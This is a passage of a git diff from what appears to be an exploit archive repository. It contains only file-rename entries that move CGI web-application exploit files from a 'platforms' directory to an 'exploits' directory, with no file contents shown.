b/exploits/cgi/webapps/22481.txt similarity index 100% rename from platforms/cgi/webapps/22481.txt rename to exploits/cgi/webapps/22481.txt diff --git a/platforms/cgi/webapps/22482.txt b/exploits/cgi/webapps/22482.txt similarity index 100% rename from platforms/cgi/webapps/22482.txt rename to exploits/cgi/webapps/22482.txt diff --git a/platforms/cgi/webapps/22499.pl b/exploits/cgi/webapps/22499.pl similarity index 100% rename from platforms/cgi/webapps/22499.pl rename to exploits/cgi/webapps/22499.pl diff --git a/platforms/cgi/webapps/22500.pl b/exploits/cgi/webapps/22500.pl similarity index 100% rename from platforms/cgi/webapps/22500.pl rename to exploits/cgi/webapps/22500.pl diff --git a/platforms/cgi/webapps/22545.pl b/exploits/cgi/webapps/22545.pl similarity index 100% rename from platforms/cgi/webapps/22545.pl rename to exploits/cgi/webapps/22545.pl diff --git a/platforms/cgi/webapps/22559.pl b/exploits/cgi/webapps/22559.pl similarity index 100% rename from platforms/cgi/webapps/22559.pl rename to exploits/cgi/webapps/22559.pl diff --git a/platforms/cgi/webapps/22571.pl b/exploits/cgi/webapps/22571.pl similarity index 100% rename from platforms/cgi/webapps/22571.pl rename to exploits/cgi/webapps/22571.pl diff --git a/platforms/cgi/webapps/22572.pl b/exploits/cgi/webapps/22572.pl similarity index 100% rename from platforms/cgi/webapps/22572.pl rename to exploits/cgi/webapps/22572.pl diff --git a/platforms/cgi/webapps/22588.txt b/exploits/cgi/webapps/22588.txt similarity index 100% rename from platforms/cgi/webapps/22588.txt rename to exploits/cgi/webapps/22588.txt diff --git a/platforms/cgi/webapps/22592.txt b/exploits/cgi/webapps/22592.txt similarity index 100% rename from platforms/cgi/webapps/22592.txt rename to exploits/cgi/webapps/22592.txt diff --git a/platforms/cgi/webapps/2266.txt b/exploits/cgi/webapps/2266.txt similarity index 100% rename from platforms/cgi/webapps/2266.txt rename to exploits/cgi/webapps/2266.txt diff --git a/platforms/cgi/webapps/22669.txt b/exploits/cgi/webapps/22669.txt similarity index 100% rename from platforms/cgi/webapps/22669.txt rename to exploits/cgi/webapps/22669.txt diff --git a/platforms/cgi/webapps/2267.txt b/exploits/cgi/webapps/2267.txt similarity index 100% rename from platforms/cgi/webapps/2267.txt rename to exploits/cgi/webapps/2267.txt diff --git a/platforms/cgi/webapps/22688.txt b/exploits/cgi/webapps/22688.txt similarity index 100% rename from platforms/cgi/webapps/22688.txt rename to exploits/cgi/webapps/22688.txt diff --git a/platforms/cgi/webapps/22689.txt b/exploits/cgi/webapps/22689.txt similarity index 100% rename from platforms/cgi/webapps/22689.txt rename to exploits/cgi/webapps/22689.txt diff --git a/platforms/cgi/webapps/22692.txt b/exploits/cgi/webapps/22692.txt similarity index 100% rename from platforms/cgi/webapps/22692.txt rename to exploits/cgi/webapps/22692.txt diff --git a/platforms/cgi/webapps/22743.txt b/exploits/cgi/webapps/22743.txt similarity index 100% rename from platforms/cgi/webapps/22743.txt rename to exploits/cgi/webapps/22743.txt diff --git a/platforms/cgi/webapps/22770.txt b/exploits/cgi/webapps/22770.txt similarity index 100% rename from platforms/cgi/webapps/22770.txt rename to exploits/cgi/webapps/22770.txt diff --git a/platforms/cgi/webapps/22772.txt b/exploits/cgi/webapps/22772.txt similarity index 100% rename from platforms/cgi/webapps/22772.txt rename to exploits/cgi/webapps/22772.txt diff --git a/platforms/cgi/webapps/22777.txt b/exploits/cgi/webapps/22777.txt similarity index 100% rename from platforms/cgi/webapps/22777.txt rename to exploits/cgi/webapps/22777.txt diff --git a/platforms/cgi/webapps/22799.txt b/exploits/cgi/webapps/22799.txt similarity index 100% rename from platforms/cgi/webapps/22799.txt rename to exploits/cgi/webapps/22799.txt diff --git a/platforms/cgi/webapps/22804.txt b/exploits/cgi/webapps/22804.txt similarity index 100% rename from platforms/cgi/webapps/22804.txt rename to exploits/cgi/webapps/22804.txt diff --git a/platforms/cgi/webapps/22843.txt b/exploits/cgi/webapps/22843.txt similarity index 100% rename from platforms/cgi/webapps/22843.txt rename to exploits/cgi/webapps/22843.txt diff --git a/platforms/cgi/webapps/22963.txt b/exploits/cgi/webapps/22963.txt similarity index 100% rename from platforms/cgi/webapps/22963.txt rename to exploits/cgi/webapps/22963.txt diff --git a/platforms/cgi/webapps/23021.txt b/exploits/cgi/webapps/23021.txt similarity index 100% rename from platforms/cgi/webapps/23021.txt rename to exploits/cgi/webapps/23021.txt diff --git a/platforms/cgi/webapps/23025.txt b/exploits/cgi/webapps/23025.txt similarity index 100% rename from platforms/cgi/webapps/23025.txt rename to exploits/cgi/webapps/23025.txt diff --git a/platforms/cgi/webapps/23059.txt b/exploits/cgi/webapps/23059.txt similarity index 100% rename from platforms/cgi/webapps/23059.txt rename to exploits/cgi/webapps/23059.txt diff --git a/platforms/cgi/webapps/23085.html b/exploits/cgi/webapps/23085.html similarity index 100% rename from platforms/cgi/webapps/23085.html rename to exploits/cgi/webapps/23085.html diff --git a/platforms/cgi/webapps/23127.txt b/exploits/cgi/webapps/23127.txt similarity index 100% rename from platforms/cgi/webapps/23127.txt rename to exploits/cgi/webapps/23127.txt diff --git a/platforms/cgi/webapps/23128.txt b/exploits/cgi/webapps/23128.txt similarity index 100% rename from platforms/cgi/webapps/23128.txt rename to exploits/cgi/webapps/23128.txt diff --git a/platforms/cgi/webapps/23153.txt b/exploits/cgi/webapps/23153.txt similarity index 100% rename from platforms/cgi/webapps/23153.txt rename to exploits/cgi/webapps/23153.txt diff --git a/platforms/cgi/webapps/23214.txt b/exploits/cgi/webapps/23214.txt similarity index 100% rename from platforms/cgi/webapps/23214.txt rename to exploits/cgi/webapps/23214.txt diff --git a/platforms/cgi/webapps/23217.txt b/exploits/cgi/webapps/23217.txt similarity index 100% rename from platforms/cgi/webapps/23217.txt rename to exploits/cgi/webapps/23217.txt diff --git a/platforms/cgi/webapps/23266.txt b/exploits/cgi/webapps/23266.txt similarity index 100% rename from platforms/cgi/webapps/23266.txt rename to exploits/cgi/webapps/23266.txt diff --git a/platforms/cgi/webapps/23275.txt b/exploits/cgi/webapps/23275.txt similarity index 100% rename from platforms/cgi/webapps/23275.txt rename to exploits/cgi/webapps/23275.txt diff --git a/platforms/cgi/webapps/23332.txt b/exploits/cgi/webapps/23332.txt similarity index 100% rename from platforms/cgi/webapps/23332.txt rename to exploits/cgi/webapps/23332.txt diff --git a/platforms/cgi/webapps/23367.txt b/exploits/cgi/webapps/23367.txt similarity index 100% rename from platforms/cgi/webapps/23367.txt rename to exploits/cgi/webapps/23367.txt diff --git a/platforms/cgi/webapps/23370.txt b/exploits/cgi/webapps/23370.txt similarity index 100% rename from platforms/cgi/webapps/23370.txt rename to exploits/cgi/webapps/23370.txt diff --git a/platforms/cgi/webapps/23395.txt b/exploits/cgi/webapps/23395.txt similarity index 100% rename from platforms/cgi/webapps/23395.txt rename to exploits/cgi/webapps/23395.txt diff --git a/platforms/cgi/webapps/23409.c b/exploits/cgi/webapps/23409.c similarity index 100% rename from platforms/cgi/webapps/23409.c rename to exploits/cgi/webapps/23409.c diff --git a/platforms/cgi/webapps/23410.txt b/exploits/cgi/webapps/23410.txt similarity index 100% rename from platforms/cgi/webapps/23410.txt rename to exploits/cgi/webapps/23410.txt diff --git a/platforms/cgi/webapps/23418.pl b/exploits/cgi/webapps/23418.pl similarity index 100% rename from platforms/cgi/webapps/23418.pl rename to exploits/cgi/webapps/23418.pl diff --git a/platforms/cgi/webapps/23421.txt b/exploits/cgi/webapps/23421.txt similarity index 100% rename from platforms/cgi/webapps/23421.txt rename to exploits/cgi/webapps/23421.txt diff --git a/platforms/cgi/webapps/23432.txt b/exploits/cgi/webapps/23432.txt similarity index 100% rename from platforms/cgi/webapps/23432.txt rename to exploits/cgi/webapps/23432.txt diff --git a/platforms/cgi/webapps/23447.txt b/exploits/cgi/webapps/23447.txt similarity index 100% rename from platforms/cgi/webapps/23447.txt rename to exploits/cgi/webapps/23447.txt diff --git a/platforms/cgi/webapps/23466.txt b/exploits/cgi/webapps/23466.txt similarity index 100% rename from platforms/cgi/webapps/23466.txt rename to exploits/cgi/webapps/23466.txt diff --git a/platforms/cgi/webapps/23467.txt b/exploits/cgi/webapps/23467.txt similarity index 100% rename from platforms/cgi/webapps/23467.txt rename to exploits/cgi/webapps/23467.txt diff --git a/platforms/cgi/webapps/23485.txt b/exploits/cgi/webapps/23485.txt similarity index 100% rename from platforms/cgi/webapps/23485.txt rename to exploits/cgi/webapps/23485.txt diff --git a/platforms/cgi/webapps/23488.txt b/exploits/cgi/webapps/23488.txt similarity index 100% rename from platforms/cgi/webapps/23488.txt rename to exploits/cgi/webapps/23488.txt diff --git a/platforms/cgi/webapps/23535.txt b/exploits/cgi/webapps/23535.txt similarity index 100% rename from platforms/cgi/webapps/23535.txt rename to exploits/cgi/webapps/23535.txt diff --git a/platforms/cgi/webapps/23548.txt b/exploits/cgi/webapps/23548.txt similarity index 100% rename from platforms/cgi/webapps/23548.txt rename to exploits/cgi/webapps/23548.txt diff --git a/platforms/cgi/webapps/23549.txt b/exploits/cgi/webapps/23549.txt similarity index 100% rename from platforms/cgi/webapps/23549.txt rename to exploits/cgi/webapps/23549.txt diff --git a/platforms/cgi/webapps/23550.txt b/exploits/cgi/webapps/23550.txt similarity index 100% rename from platforms/cgi/webapps/23550.txt rename to exploits/cgi/webapps/23550.txt diff --git a/platforms/cgi/webapps/23551.txt b/exploits/cgi/webapps/23551.txt similarity index 100% rename from platforms/cgi/webapps/23551.txt rename to exploits/cgi/webapps/23551.txt diff --git a/platforms/cgi/webapps/23613.txt b/exploits/cgi/webapps/23613.txt similarity index 100% rename from platforms/cgi/webapps/23613.txt rename to exploits/cgi/webapps/23613.txt diff --git a/platforms/cgi/webapps/23615.txt b/exploits/cgi/webapps/23615.txt similarity index 100% rename from platforms/cgi/webapps/23615.txt rename to exploits/cgi/webapps/23615.txt diff --git a/platforms/cgi/webapps/23629.txt b/exploits/cgi/webapps/23629.txt similarity index 100% rename from platforms/cgi/webapps/23629.txt rename to exploits/cgi/webapps/23629.txt diff --git a/platforms/cgi/webapps/23647.txt b/exploits/cgi/webapps/23647.txt similarity index 100% rename from platforms/cgi/webapps/23647.txt rename to exploits/cgi/webapps/23647.txt diff --git a/platforms/cgi/webapps/23659.txt b/exploits/cgi/webapps/23659.txt similarity index 100% rename from platforms/cgi/webapps/23659.txt rename to exploits/cgi/webapps/23659.txt diff --git a/platforms/cgi/webapps/23705.txt b/exploits/cgi/webapps/23705.txt similarity index 100% rename from platforms/cgi/webapps/23705.txt rename to exploits/cgi/webapps/23705.txt diff --git a/platforms/cgi/webapps/23706.txt b/exploits/cgi/webapps/23706.txt similarity index 100% rename from platforms/cgi/webapps/23706.txt rename to exploits/cgi/webapps/23706.txt diff --git a/platforms/cgi/webapps/23806.txt b/exploits/cgi/webapps/23806.txt similarity index 100% rename from platforms/cgi/webapps/23806.txt rename to exploits/cgi/webapps/23806.txt diff --git a/platforms/cgi/webapps/23807.txt b/exploits/cgi/webapps/23807.txt similarity index 100% rename from platforms/cgi/webapps/23807.txt rename to exploits/cgi/webapps/23807.txt diff --git a/platforms/cgi/webapps/23809.txt b/exploits/cgi/webapps/23809.txt similarity index 100% rename from platforms/cgi/webapps/23809.txt rename to exploits/cgi/webapps/23809.txt diff --git a/platforms/cgi/webapps/23810.txt b/exploits/cgi/webapps/23810.txt similarity index 100% rename from platforms/cgi/webapps/23810.txt rename to exploits/cgi/webapps/23810.txt diff --git a/platforms/cgi/webapps/23890.txt b/exploits/cgi/webapps/23890.txt similarity index 100% rename from platforms/cgi/webapps/23890.txt rename to exploits/cgi/webapps/23890.txt diff --git a/platforms/cgi/webapps/23894.txt b/exploits/cgi/webapps/23894.txt similarity index 100% rename from platforms/cgi/webapps/23894.txt rename to exploits/cgi/webapps/23894.txt diff --git a/platforms/cgi/webapps/23897.txt b/exploits/cgi/webapps/23897.txt similarity index 100% rename from platforms/cgi/webapps/23897.txt rename to exploits/cgi/webapps/23897.txt diff --git a/platforms/cgi/webapps/23907.pl b/exploits/cgi/webapps/23907.pl similarity index 100% rename from platforms/cgi/webapps/23907.pl rename to exploits/cgi/webapps/23907.pl diff --git a/platforms/cgi/webapps/23913.txt b/exploits/cgi/webapps/23913.txt similarity index 100% rename from platforms/cgi/webapps/23913.txt rename to exploits/cgi/webapps/23913.txt diff --git a/platforms/cgi/webapps/23914.txt b/exploits/cgi/webapps/23914.txt similarity index 100% rename from platforms/cgi/webapps/23914.txt rename to exploits/cgi/webapps/23914.txt diff --git a/platforms/cgi/webapps/23937.txt b/exploits/cgi/webapps/23937.txt similarity index 100% rename from platforms/cgi/webapps/23937.txt rename to exploits/cgi/webapps/23937.txt diff --git a/platforms/cgi/webapps/23938.txt b/exploits/cgi/webapps/23938.txt similarity index 100% rename from platforms/cgi/webapps/23938.txt rename to exploits/cgi/webapps/23938.txt diff --git a/platforms/cgi/webapps/23939.txt b/exploits/cgi/webapps/23939.txt similarity index 100% rename from platforms/cgi/webapps/23939.txt rename to exploits/cgi/webapps/23939.txt diff --git a/platforms/cgi/webapps/23940.txt b/exploits/cgi/webapps/23940.txt similarity index 100% rename from platforms/cgi/webapps/23940.txt rename to exploits/cgi/webapps/23940.txt diff --git a/platforms/cgi/webapps/23941.txt b/exploits/cgi/webapps/23941.txt similarity index 100% rename from platforms/cgi/webapps/23941.txt rename to exploits/cgi/webapps/23941.txt diff --git a/platforms/cgi/webapps/23942.txt b/exploits/cgi/webapps/23942.txt similarity index 100% rename from platforms/cgi/webapps/23942.txt rename to exploits/cgi/webapps/23942.txt diff --git a/platforms/cgi/webapps/23986.txt b/exploits/cgi/webapps/23986.txt similarity index 100% rename from platforms/cgi/webapps/23986.txt rename to exploits/cgi/webapps/23986.txt diff --git a/platforms/cgi/webapps/24001.txt b/exploits/cgi/webapps/24001.txt similarity index 100% rename from platforms/cgi/webapps/24001.txt rename to exploits/cgi/webapps/24001.txt diff --git a/platforms/cgi/webapps/24094.txt b/exploits/cgi/webapps/24094.txt similarity index 100% rename from platforms/cgi/webapps/24094.txt rename to exploits/cgi/webapps/24094.txt diff --git a/platforms/cgi/webapps/24122.txt b/exploits/cgi/webapps/24122.txt similarity index 100% rename from platforms/cgi/webapps/24122.txt rename to exploits/cgi/webapps/24122.txt diff --git a/platforms/cgi/webapps/24164.txt b/exploits/cgi/webapps/24164.txt similarity index 100% rename from platforms/cgi/webapps/24164.txt rename to exploits/cgi/webapps/24164.txt diff --git a/platforms/cgi/webapps/24175.txt b/exploits/cgi/webapps/24175.txt similarity index 100% rename from platforms/cgi/webapps/24175.txt rename to exploits/cgi/webapps/24175.txt diff --git a/platforms/cgi/webapps/24188.pl b/exploits/cgi/webapps/24188.pl similarity index 100% rename from platforms/cgi/webapps/24188.pl rename to exploits/cgi/webapps/24188.pl diff --git a/platforms/cgi/webapps/24197.txt b/exploits/cgi/webapps/24197.txt similarity index 100% rename from platforms/cgi/webapps/24197.txt rename to exploits/cgi/webapps/24197.txt diff --git a/platforms/cgi/webapps/242.pl b/exploits/cgi/webapps/242.pl similarity index 100% rename from platforms/cgi/webapps/242.pl rename to exploits/cgi/webapps/242.pl diff --git a/platforms/cgi/webapps/24236.txt b/exploits/cgi/webapps/24236.txt similarity index 100% rename from platforms/cgi/webapps/24236.txt rename to exploits/cgi/webapps/24236.txt diff --git a/platforms/cgi/webapps/24237.txt b/exploits/cgi/webapps/24237.txt similarity index 100% rename from platforms/cgi/webapps/24237.txt rename to exploits/cgi/webapps/24237.txt diff --git a/platforms/cgi/webapps/24244.txt b/exploits/cgi/webapps/24244.txt similarity index 100% rename from platforms/cgi/webapps/24244.txt rename to exploits/cgi/webapps/24244.txt diff --git a/platforms/cgi/webapps/24245.txt b/exploits/cgi/webapps/24245.txt similarity index 100% rename from platforms/cgi/webapps/24245.txt rename to exploits/cgi/webapps/24245.txt diff --git a/platforms/cgi/webapps/24251.txt b/exploits/cgi/webapps/24251.txt similarity index 100% rename from platforms/cgi/webapps/24251.txt rename to exploits/cgi/webapps/24251.txt diff --git a/platforms/cgi/webapps/24252.txt b/exploits/cgi/webapps/24252.txt similarity index 100% rename from platforms/cgi/webapps/24252.txt rename to exploits/cgi/webapps/24252.txt diff --git a/platforms/cgi/webapps/24254.txt b/exploits/cgi/webapps/24254.txt similarity index 100% rename from platforms/cgi/webapps/24254.txt rename to exploits/cgi/webapps/24254.txt diff --git a/platforms/cgi/webapps/24284.txt b/exploits/cgi/webapps/24284.txt similarity index 100% rename from platforms/cgi/webapps/24284.txt rename to exploits/cgi/webapps/24284.txt diff --git a/platforms/cgi/webapps/24285.txt b/exploits/cgi/webapps/24285.txt similarity index 100% rename from platforms/cgi/webapps/24285.txt rename to exploits/cgi/webapps/24285.txt diff --git a/platforms/cgi/webapps/24286.txt b/exploits/cgi/webapps/24286.txt similarity index 100% rename from platforms/cgi/webapps/24286.txt rename to exploits/cgi/webapps/24286.txt diff --git a/platforms/cgi/webapps/24287.txt b/exploits/cgi/webapps/24287.txt similarity index 100% rename from platforms/cgi/webapps/24287.txt rename to exploits/cgi/webapps/24287.txt diff --git a/platforms/cgi/webapps/24347.txt b/exploits/cgi/webapps/24347.txt similarity index 100% rename from platforms/cgi/webapps/24347.txt rename to exploits/cgi/webapps/24347.txt diff --git a/platforms/cgi/webapps/24400.txt b/exploits/cgi/webapps/24400.txt similarity index 100% rename from platforms/cgi/webapps/24400.txt rename to exploits/cgi/webapps/24400.txt diff --git a/platforms/cgi/webapps/24401.txt b/exploits/cgi/webapps/24401.txt similarity index 100% rename from platforms/cgi/webapps/24401.txt rename to exploits/cgi/webapps/24401.txt diff --git a/platforms/cgi/webapps/24402.php b/exploits/cgi/webapps/24402.php similarity index 100% rename from platforms/cgi/webapps/24402.php rename to exploits/cgi/webapps/24402.php diff --git a/platforms/cgi/webapps/24408.txt b/exploits/cgi/webapps/24408.txt similarity index 100% rename from platforms/cgi/webapps/24408.txt rename to exploits/cgi/webapps/24408.txt diff --git a/platforms/cgi/webapps/24574.txt b/exploits/cgi/webapps/24574.txt similarity index 100% rename from platforms/cgi/webapps/24574.txt rename to exploits/cgi/webapps/24574.txt diff --git a/platforms/cgi/webapps/24576.txt b/exploits/cgi/webapps/24576.txt similarity index 100% rename from platforms/cgi/webapps/24576.txt rename to exploits/cgi/webapps/24576.txt diff --git a/platforms/cgi/webapps/24591.txt b/exploits/cgi/webapps/24591.txt similarity index 100% rename from platforms/cgi/webapps/24591.txt rename to exploits/cgi/webapps/24591.txt diff --git a/platforms/cgi/webapps/24611.txt b/exploits/cgi/webapps/24611.txt similarity index 100% rename from platforms/cgi/webapps/24611.txt rename to exploits/cgi/webapps/24611.txt diff --git a/platforms/cgi/webapps/24612.txt b/exploits/cgi/webapps/24612.txt similarity index 100% rename from platforms/cgi/webapps/24612.txt rename to exploits/cgi/webapps/24612.txt diff --git a/platforms/cgi/webapps/24630.txt b/exploits/cgi/webapps/24630.txt similarity index 100% rename from platforms/cgi/webapps/24630.txt rename to exploits/cgi/webapps/24630.txt diff --git a/platforms/cgi/webapps/24700.txt b/exploits/cgi/webapps/24700.txt similarity index 100% rename from platforms/cgi/webapps/24700.txt rename to exploits/cgi/webapps/24700.txt diff --git a/platforms/cgi/webapps/24703.txt b/exploits/cgi/webapps/24703.txt similarity index 100% rename from platforms/cgi/webapps/24703.txt rename to exploits/cgi/webapps/24703.txt diff --git a/platforms/cgi/webapps/24721.txt b/exploits/cgi/webapps/24721.txt similarity index 100% rename from platforms/cgi/webapps/24721.txt rename to exploits/cgi/webapps/24721.txt diff --git a/platforms/cgi/webapps/24722.txt b/exploits/cgi/webapps/24722.txt similarity index 100% rename from platforms/cgi/webapps/24722.txt rename to exploits/cgi/webapps/24722.txt diff --git a/platforms/cgi/webapps/24723.txt b/exploits/cgi/webapps/24723.txt similarity index 100% rename from platforms/cgi/webapps/24723.txt rename to exploits/cgi/webapps/24723.txt diff --git a/platforms/cgi/webapps/24779.txt b/exploits/cgi/webapps/24779.txt similarity index 100% rename from platforms/cgi/webapps/24779.txt rename to exploits/cgi/webapps/24779.txt diff --git a/platforms/cgi/webapps/24836.txt b/exploits/cgi/webapps/24836.txt similarity index 100% rename from platforms/cgi/webapps/24836.txt rename to exploits/cgi/webapps/24836.txt diff --git a/platforms/cgi/webapps/24986.txt b/exploits/cgi/webapps/24986.txt similarity index 100% rename from platforms/cgi/webapps/24986.txt rename to exploits/cgi/webapps/24986.txt diff --git a/platforms/cgi/webapps/25041.txt b/exploits/cgi/webapps/25041.txt similarity index 100% rename from platforms/cgi/webapps/25041.txt rename to exploits/cgi/webapps/25041.txt diff --git a/platforms/cgi/webapps/25042.txt b/exploits/cgi/webapps/25042.txt similarity index 100% rename from platforms/cgi/webapps/25042.txt rename to exploits/cgi/webapps/25042.txt diff --git a/platforms/cgi/webapps/25051.txt b/exploits/cgi/webapps/25051.txt similarity index 100% rename from platforms/cgi/webapps/25051.txt rename to exploits/cgi/webapps/25051.txt diff --git a/platforms/cgi/webapps/25067.txt b/exploits/cgi/webapps/25067.txt similarity index 100% rename from platforms/cgi/webapps/25067.txt rename to exploits/cgi/webapps/25067.txt diff --git a/platforms/cgi/webapps/25096.txt b/exploits/cgi/webapps/25096.txt similarity index 100% rename from platforms/cgi/webapps/25096.txt rename to exploits/cgi/webapps/25096.txt diff --git a/platforms/cgi/webapps/25108.txt b/exploits/cgi/webapps/25108.txt similarity index 100% rename from platforms/cgi/webapps/25108.txt rename to exploits/cgi/webapps/25108.txt diff --git a/platforms/cgi/webapps/25147.txt b/exploits/cgi/webapps/25147.txt similarity index 100% rename from platforms/cgi/webapps/25147.txt rename to exploits/cgi/webapps/25147.txt diff --git a/platforms/cgi/webapps/25201.txt b/exploits/cgi/webapps/25201.txt similarity index 100% rename from platforms/cgi/webapps/25201.txt rename to exploits/cgi/webapps/25201.txt diff --git a/platforms/cgi/webapps/25331.txt b/exploits/cgi/webapps/25331.txt similarity index 100% rename from platforms/cgi/webapps/25331.txt rename to exploits/cgi/webapps/25331.txt diff --git a/platforms/cgi/webapps/25350.txt b/exploits/cgi/webapps/25350.txt similarity index 100% rename from platforms/cgi/webapps/25350.txt rename to exploits/cgi/webapps/25350.txt diff --git a/platforms/cgi/webapps/25592.txt b/exploits/cgi/webapps/25592.txt similarity index 100% rename from platforms/cgi/webapps/25592.txt rename to exploits/cgi/webapps/25592.txt diff --git a/platforms/cgi/webapps/25594.txt b/exploits/cgi/webapps/25594.txt similarity index 100% rename from platforms/cgi/webapps/25594.txt rename to exploits/cgi/webapps/25594.txt diff --git a/platforms/cgi/webapps/25622.txt b/exploits/cgi/webapps/25622.txt similarity index 100% rename from platforms/cgi/webapps/25622.txt rename to exploits/cgi/webapps/25622.txt diff --git a/platforms/cgi/webapps/25632.txt b/exploits/cgi/webapps/25632.txt similarity index 100% rename from platforms/cgi/webapps/25632.txt rename to exploits/cgi/webapps/25632.txt diff --git a/platforms/cgi/webapps/25634.txt b/exploits/cgi/webapps/25634.txt similarity index 100% rename from platforms/cgi/webapps/25634.txt rename to exploits/cgi/webapps/25634.txt diff --git a/platforms/cgi/webapps/25649.txt b/exploits/cgi/webapps/25649.txt similarity index 100% rename from platforms/cgi/webapps/25649.txt rename to exploits/cgi/webapps/25649.txt diff --git a/platforms/cgi/webapps/25666.txt b/exploits/cgi/webapps/25666.txt similarity index 100% rename from platforms/cgi/webapps/25666.txt rename to exploits/cgi/webapps/25666.txt diff --git a/platforms/cgi/webapps/25668.txt b/exploits/cgi/webapps/25668.txt similarity index 100% rename from platforms/cgi/webapps/25668.txt rename to exploits/cgi/webapps/25668.txt diff --git a/platforms/cgi/webapps/25817.txt b/exploits/cgi/webapps/25817.txt similarity index 100% rename from platforms/cgi/webapps/25817.txt rename to exploits/cgi/webapps/25817.txt diff --git a/platforms/cgi/webapps/25918.txt b/exploits/cgi/webapps/25918.txt similarity index 100% rename from platforms/cgi/webapps/25918.txt rename to exploits/cgi/webapps/25918.txt diff --git a/platforms/cgi/webapps/25920.pl b/exploits/cgi/webapps/25920.pl similarity index 100% rename from platforms/cgi/webapps/25920.pl rename to exploits/cgi/webapps/25920.pl diff --git a/platforms/cgi/webapps/25939.txt b/exploits/cgi/webapps/25939.txt similarity index 100% rename from platforms/cgi/webapps/25939.txt rename to exploits/cgi/webapps/25939.txt diff --git a/platforms/cgi/webapps/25950.pl b/exploits/cgi/webapps/25950.pl similarity index 100% rename from platforms/cgi/webapps/25950.pl rename to exploits/cgi/webapps/25950.pl diff --git a/platforms/cgi/webapps/25952.txt b/exploits/cgi/webapps/25952.txt similarity index 100% rename from platforms/cgi/webapps/25952.txt rename to exploits/cgi/webapps/25952.txt diff --git a/platforms/cgi/webapps/26017.txt b/exploits/cgi/webapps/26017.txt similarity index 100% rename from platforms/cgi/webapps/26017.txt rename to exploits/cgi/webapps/26017.txt diff --git a/platforms/cgi/webapps/26046.txt b/exploits/cgi/webapps/26046.txt similarity index 100% rename from platforms/cgi/webapps/26046.txt rename to exploits/cgi/webapps/26046.txt diff --git a/platforms/cgi/webapps/26066.txt b/exploits/cgi/webapps/26066.txt similarity index 100% rename from platforms/cgi/webapps/26066.txt rename to exploits/cgi/webapps/26066.txt diff --git a/platforms/cgi/webapps/26256.txt b/exploits/cgi/webapps/26256.txt similarity index 100% rename from platforms/cgi/webapps/26256.txt rename to exploits/cgi/webapps/26256.txt diff --git a/platforms/cgi/webapps/26289.txt b/exploits/cgi/webapps/26289.txt similarity index 100% rename from platforms/cgi/webapps/26289.txt rename to exploits/cgi/webapps/26289.txt diff --git a/platforms/cgi/webapps/26290.txt b/exploits/cgi/webapps/26290.txt similarity index 100% rename from platforms/cgi/webapps/26290.txt rename to exploits/cgi/webapps/26290.txt diff --git a/platforms/cgi/webapps/26344.txt b/exploits/cgi/webapps/26344.txt similarity index 100% rename from platforms/cgi/webapps/26344.txt rename to exploits/cgi/webapps/26344.txt diff --git a/platforms/cgi/webapps/26398.txt b/exploits/cgi/webapps/26398.txt similarity index 100% rename from platforms/cgi/webapps/26398.txt rename to exploits/cgi/webapps/26398.txt diff --git a/platforms/cgi/webapps/26461.txt b/exploits/cgi/webapps/26461.txt similarity index 100% rename from platforms/cgi/webapps/26461.txt rename to exploits/cgi/webapps/26461.txt diff --git a/platforms/cgi/webapps/26462.txt b/exploits/cgi/webapps/26462.txt similarity index 100% rename from platforms/cgi/webapps/26462.txt rename to exploits/cgi/webapps/26462.txt diff --git a/platforms/cgi/webapps/26463.txt b/exploits/cgi/webapps/26463.txt similarity index 100% rename from platforms/cgi/webapps/26463.txt rename to exploits/cgi/webapps/26463.txt diff --git a/platforms/cgi/webapps/26475.txt b/exploits/cgi/webapps/26475.txt similarity index 100% rename from platforms/cgi/webapps/26475.txt rename to exploits/cgi/webapps/26475.txt diff --git a/platforms/cgi/webapps/26506.txt b/exploits/cgi/webapps/26506.txt similarity index 100% rename from platforms/cgi/webapps/26506.txt rename to exploits/cgi/webapps/26506.txt diff --git a/platforms/cgi/webapps/26507.txt b/exploits/cgi/webapps/26507.txt similarity index 100% rename from platforms/cgi/webapps/26507.txt rename to exploits/cgi/webapps/26507.txt diff --git a/platforms/cgi/webapps/26508.txt b/exploits/cgi/webapps/26508.txt similarity index 100% rename from platforms/cgi/webapps/26508.txt rename to exploits/cgi/webapps/26508.txt diff --git a/platforms/cgi/webapps/26509.txt b/exploits/cgi/webapps/26509.txt similarity index 100% rename from platforms/cgi/webapps/26509.txt rename to exploits/cgi/webapps/26509.txt diff --git a/platforms/cgi/webapps/26550.txt b/exploits/cgi/webapps/26550.txt similarity index 100% rename from platforms/cgi/webapps/26550.txt rename to exploits/cgi/webapps/26550.txt diff --git a/platforms/cgi/webapps/26551.txt b/exploits/cgi/webapps/26551.txt similarity index 100% rename from platforms/cgi/webapps/26551.txt rename to exploits/cgi/webapps/26551.txt diff --git a/platforms/cgi/webapps/26552.txt b/exploits/cgi/webapps/26552.txt similarity index 100% rename from platforms/cgi/webapps/26552.txt rename to exploits/cgi/webapps/26552.txt diff --git a/platforms/cgi/webapps/26716.txt b/exploits/cgi/webapps/26716.txt similarity index 100% rename from platforms/cgi/webapps/26716.txt rename to exploits/cgi/webapps/26716.txt diff --git a/platforms/cgi/webapps/26721.txt b/exploits/cgi/webapps/26721.txt similarity index 100% rename from platforms/cgi/webapps/26721.txt rename to exploits/cgi/webapps/26721.txt diff --git a/platforms/cgi/webapps/26761.txt b/exploits/cgi/webapps/26761.txt similarity index 100% rename from platforms/cgi/webapps/26761.txt rename to exploits/cgi/webapps/26761.txt diff --git a/platforms/cgi/webapps/26771.txt b/exploits/cgi/webapps/26771.txt similarity index 100% rename from platforms/cgi/webapps/26771.txt rename to exploits/cgi/webapps/26771.txt diff --git a/platforms/cgi/webapps/26786.txt b/exploits/cgi/webapps/26786.txt similarity index 100% rename from platforms/cgi/webapps/26786.txt rename to exploits/cgi/webapps/26786.txt diff --git a/platforms/cgi/webapps/26842.txt b/exploits/cgi/webapps/26842.txt similarity index 100% rename from platforms/cgi/webapps/26842.txt rename to exploits/cgi/webapps/26842.txt diff --git a/platforms/cgi/webapps/26843.txt b/exploits/cgi/webapps/26843.txt similarity index 100% rename from platforms/cgi/webapps/26843.txt rename to exploits/cgi/webapps/26843.txt diff --git a/platforms/cgi/webapps/26845.txt b/exploits/cgi/webapps/26845.txt similarity index 100% rename from platforms/cgi/webapps/26845.txt rename to exploits/cgi/webapps/26845.txt diff --git a/platforms/cgi/webapps/26846.txt b/exploits/cgi/webapps/26846.txt similarity index 100% rename from platforms/cgi/webapps/26846.txt rename to exploits/cgi/webapps/26846.txt diff --git a/platforms/cgi/webapps/26847.txt b/exploits/cgi/webapps/26847.txt similarity index 100% rename from platforms/cgi/webapps/26847.txt rename to 